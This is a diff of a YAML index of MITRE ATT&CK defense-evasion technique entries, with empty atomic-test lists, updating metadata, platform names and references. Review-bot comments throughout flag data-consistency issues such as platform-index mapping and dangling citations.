+ adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+ API, causing the account to be severed from the AWS Organization to which
+ it was tied and removing any Service Control Policies, guardrails, or restrictions
+ imposed upon it by its former Organization. Alternatively, adversaries may
+ call the `CreateAccount` API in order to create a new account within an AWS
+ Organization. This account will use the same payment methods registered to
+ the payment account but may not be subject to existing detections or Service
+ Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ type: attack-pattern
+ id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+ created: '2024-09-25T14:16:19.234Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1666
+ external_id: T1666
+ - source_name: AWS Organizations
+ description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+ Retrieved September 25, 2024.
+ url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Microsoft Subscription Hijacking 2022
+ description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+ using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+ url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+ - source_name: Microsoft Azure Resources
+ description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+ effectively. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+ - source_name: Microsoft Peach Sandstorm 2023
+ description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+ password spray campaigns enable intelligence collection at high-value targets.
+ Retrieved September 18, 2023.
+ url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
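Review bot: T1666 is added with `x_mitre_detection: ''` and `atomic_tests: []`, and its only platform is `IaaS`, while the description covers both AWS (`LeaveOrganization`, `CreateAccount`) and Azure (subscription creation and hijacking). Since this file is the Azure index, confirm that the same object also landed in the AWS and generic IaaS indexes in this change and that the platform-to-index mapping treats `IaaS` as applying to all of them.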
T1564.008:
technique:
- modified: '2023-10-16T16:41:53.957Z'
+ modified: '2024-10-15T15:56:27.592Z'
name: 'Hide Artifacts: Email Hiding Rules'
description: |-
Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule
or Set-InboxRule
[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
@@ -901,11 +989,10 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
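Review bot: replacing `Office 365` and `Google Workspace` with `Office Suite` in `x_mitre_platforms` follows the upstream platform consolidation (hence the bump to `1.4`), but if the per-platform index files in this directory are derived from `x_mitre_platforms`, T1564.008 will silently drop out of the Office 365 and Google Workspace indexes unless the generator maps `Office Suite` back onto them. Worth checking the regenerated per-platform indexes in this same change.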
@@ -950,12 +1037,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.008
atomic_tests: []
T1027.013:
technique:
- modified: '2024-04-19T04:03:07.164Z'
+ modified: '2024-10-15T16:32:45.108Z'
name: Encrypted/Encoded File
description: "Adversaries may encrypt or encode files to obfuscate strings,
bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1026,11 +1112,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:50.568Z'
name: Rootkit
description: "Adversaries may use rootkits to hide the presence of programs,
files, network connections, services, drivers, and other system components.
@@ -1098,7 +1183,6 @@ defense-evasion:
url: https://en.wikipedia.org/wiki/Rootkit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1014
atomic_tests: []
T1036.007:
@@ -1129,7 +1213,7 @@ defense-evasion:
url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
with double extension?. Retrieved July 27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:09:59.588Z'
name: 'Masquerading: Double File Extension'
description: "Adversaries may abuse a double extension in the filename as a
means of masquerading the true file type. A file name may include a secondary
@@ -1166,13 +1250,11 @@ defense-evasion:
x_mitre_data_sources:
- 'File: File Creation'
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1036.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1273,7 +1355,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -1304,7 +1385,7 @@ defense-evasion:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1338,13 +1419,11 @@ defense-evasion:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1578:
technique:
- modified: '2023-09-05T20:45:22.041Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Modify Cloud Compute Infrastructure
description: |-
An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1396,12 +1475,11 @@ defense-evasion:
- source_name: Mandiant M-Trends 2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542.001:
technique:
@@ -1481,12 +1559,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1505,7 +1582,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -1519,7 +1595,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -1546,8 +1621,8 @@ defense-evasion:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1578,7 +1653,8 @@ defense-evasion:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
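Review bot: `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` are appended at the end of T1574.011 here, while the same keys were removed from their earlier positions in the two preceding hunks (where the spec version was 2.1.0), so the net change is a spec-version bump plus key movement. A stable key order in the generator would reduce this to a one-line diff.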
@@ -1635,7 +1711,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1218.013:
technique:
@@ -1688,7 +1763,7 @@ defense-evasion:
PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would
inject an import table entry consisting of the specified DLL into the module
at the given base address.(Citation: Mavinject Functionality Deconstructed)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:35:08.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Mavinject
x_mitre_detection: |-
@@ -1704,11 +1779,10 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.005:
technique:
- modified: '2023-09-14T21:12:48.409Z'
+ modified: '2024-09-12T19:30:45.064Z'
name: 'Masquerading: Match Legitimate Name or Location'
description: |-
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -1754,8 +1828,8 @@ defense-evasion:
external_id: T1036.005
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Docker Images
description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
url: https://docs.docker.com/engine/reference/commandline/images/
@@ -1765,9 +1839,8 @@ defense-evasion:
url: https://www.elastic.co/blog/how-hunt-masquerade-ball
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.005
atomic_tests: []
T1600:
@@ -1794,7 +1867,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:49.258Z'
name: Weaken Encryption
description: |-
Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -1818,8 +1891,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1036.008:
technique:
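Review bot: for T1600 both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed with nothing replacing them, whereas the objects above keep `x_mitre_attack_spec_version` (bumped to 3.2.0 for T1036.005). Together with `modified` moving back to 2020-10-21 in the previous hunk, this object now looks like a revision that predates the spec-version fields; worth checking that it is not a stale record. The same combination recurs for T1562.009, T1542.005, T1070.002, T1218.004 and T1600.001 below.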
@@ -1883,11 +1954,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564:
technique:
- modified: '2024-03-29T17:45:48.126Z'
+ modified: '2024-10-15T15:58:49.815Z'
name: Hide Artifacts
description: |-
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -1908,8 +1978,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Metadata'
- 'Application Log: Application Log Content'
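Review bot: the platform value changes from `Office 365` to `Office Suite` (version 1.2 to 1.3). Any consumer that filters or groups on the literal platform string needs the same rename in the same change, otherwise this technique silently drops out of an Office-scoped view.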
@@ -1953,12 +2023,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -1978,9 +2047,14 @@ defense-evasion:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
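Review bot: the extended description cites `AWS RE:Inforce Threat Detection 2024`, which only resolves once the matching `external_references` entry added further down is present; if the hunks are applied separately the citation dangles. Also note the pre-existing `AADInternals zure AD Federated Domain` key in the unchanged context line: it matches the upstream `source_name` as written, so do not hand-correct the spelling here without changing the reference entry as well.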
@@ -2000,9 +2074,8 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
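Review bot: `Azure AD` and `SaaS` are replaced by the single platform `Identity Provider` (version 2.0 to 2.1). This collapses two former platform buckets into one, so anything that counts techniques per platform or builds an Azure AD-specific view will change; call that out in the commit message alongside the Office rename above.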
@@ -2019,6 +2092,10 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2052,7 +2129,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1562.009:
@@ -2102,7 +2178,7 @@ defense-evasion:
url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
30, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-31T14:51:47.352Z'
name: 'Impair Defenses: Safe Boot Mode'
description: |-
Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2130,8 +2206,6 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1562.009
atomic_tests: []
T1542.005:
@@ -2174,7 +2248,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2198,12 +2272,10 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -2293,13 +2365,12 @@ defense-evasion:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests: []
T1070.002:
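Review bot: the Deloitte reference URL gains an `/edit` suffix on a Google Drive file link together with a new retrieval date. The `/edit` form is not the usual share link for a Drive file, so confirm it still resolves for an unauthenticated visitor before accepting the updated reference.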
@@ -2323,7 +2394,7 @@ defense-evasion:
url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
be Monitoring. Retrieved March 29, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T21:23:51.886Z'
name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
description: |
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/
directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2348,8 +2419,6 @@ defense-evasion:
- 'File: File Deletion'
- 'File: File Modification'
- 'Command: Command Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1070.002
atomic_tests: []
T1218.004:
@@ -2378,7 +2447,7 @@ defense-evasion:
- source_name: LOLBAS Installutil
url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:47:52.603Z'
name: 'Signed Binary Proxy Execution: InstallUtil'
description: |-
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe
and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe
.
@@ -2404,8 +2473,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.004
atomic_tests: []
T1027.008:
@@ -2457,18 +2524,17 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -2484,8 +2550,8 @@ defense-evasion:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -2499,7 +2565,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -2525,6 +2591,10 @@ defense-evasion:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
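Review bot: the new Hexacorn reference is well formed, but the adjacent unchanged entry `Microsoft. (, May 23)` still has an empty year. That is an upstream data defect rather than something introduced here, and a local fix would be overwritten on the next regeneration, so it belongs in an upstream issue instead.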
@@ -2552,12 +2622,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1553.001:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-21T19:30:58.414Z'
name: 'Subvert Trust Controls: Gatekeeper Bypass'
description: |-
Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -2653,7 +2722,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.001
atomic_tests: []
T1553.002:
@@ -2720,7 +2788,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.009:
technique:
@@ -2785,11 +2852,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.001:
technique:
